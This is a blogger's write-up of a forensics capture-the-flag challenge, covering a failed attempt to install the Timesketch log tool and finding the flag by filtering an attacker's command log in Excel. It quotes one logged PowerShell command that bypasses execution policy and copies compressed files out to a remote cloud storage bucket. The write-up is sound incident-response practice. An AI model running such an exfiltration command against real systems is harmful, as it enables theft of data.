Well…That was a weird one - kind of solved it before I even started writing a log.
Let’s go through my steps - downloading the file, I got a compressed file containing a Readme.md
and a CTF CSV-EASY-final.csv
files.
The csv
is not too large but not too small (1.6mb), so I opened the Readme
first.
It contains a short story about a fictional company detecting a compromised machine and collecting logs from it. My job is to sift through them, follow the malicious actor’s footsteps, and discover the flag.
The file also contains a walkthrough on installing Timesketch. I’m not familiar with it in particular, but programs that process logs are commonly used in detection & resposne teams for forensic analysis during incidents. Turns out, Timesketch is Google’s own (open-source) log analysis tool.
I followed the installation guide, which deploys Timesketch using docker-compose
, a tool that allows deploying multi-container docker apps.
Downloading the relevant images and running docker-compose
on the given .yml
file, looks like Timesketch starts a local nginx server with a redis database, along with opensearch - a tool for searching through large data.
I bumped into an issue with deploying the app - it had issues with binding to port 80, even though it wasn’t taken, but then locked it forever until I restarted WSL.
I tried fixing it for a while to no avail. I seems to be a (sadly common) issue with deploying processes on WSL that bind on common ports.
After failing for a while, I decided to take a peek at the csv
manually:
The table seems to list actions executed by the malicious actor on a Windows machine. The actions start off with some commands for initial recon in CMD, and then moved to execute powershell commands.
The file contains thousands of actions, and I needed a quick way to sift through them. I created a filter over the entire table and looked for columns which contained small distinct number of options.
Some columns have just one or two distinct values whereas others have thousands. However, I found target_executed_command
to be especially interesting because, besides having a very attractive name, has just about two dozen distinct values.
Scrolling to the right in the little Excel pop-up, and skimming over the commands, something immediately pops up - the URL of a flag!
powershell.exe -ExecutionPolicy Bypass -C $SourceFile=(Get-Item #{host.dir.compress});$RemoteName="exfil-xbhqwf-$($SourceFile.name)";cloud gs cp #{transferwiser.io} gs://#{01000110 01001100 01000001 01000111 00111010.https://h[4]ck[1]n/g.go[og]le/s[ol]ve/...
}/$RemoteName;
The domain is jumbled, probably meant to stop hunters from searching the domain in the entire csv
.
This command and others in a short timeframe around it point to the malicious actor trying to exfiltrate data from the machine to a Google storage bucket. The binary values before the flag URL simply spell out FLAG:
.
Anyway, it’s unfortunate I wasn’t able to see how Timesketch works and solve this using it. But in any case - I have my flag.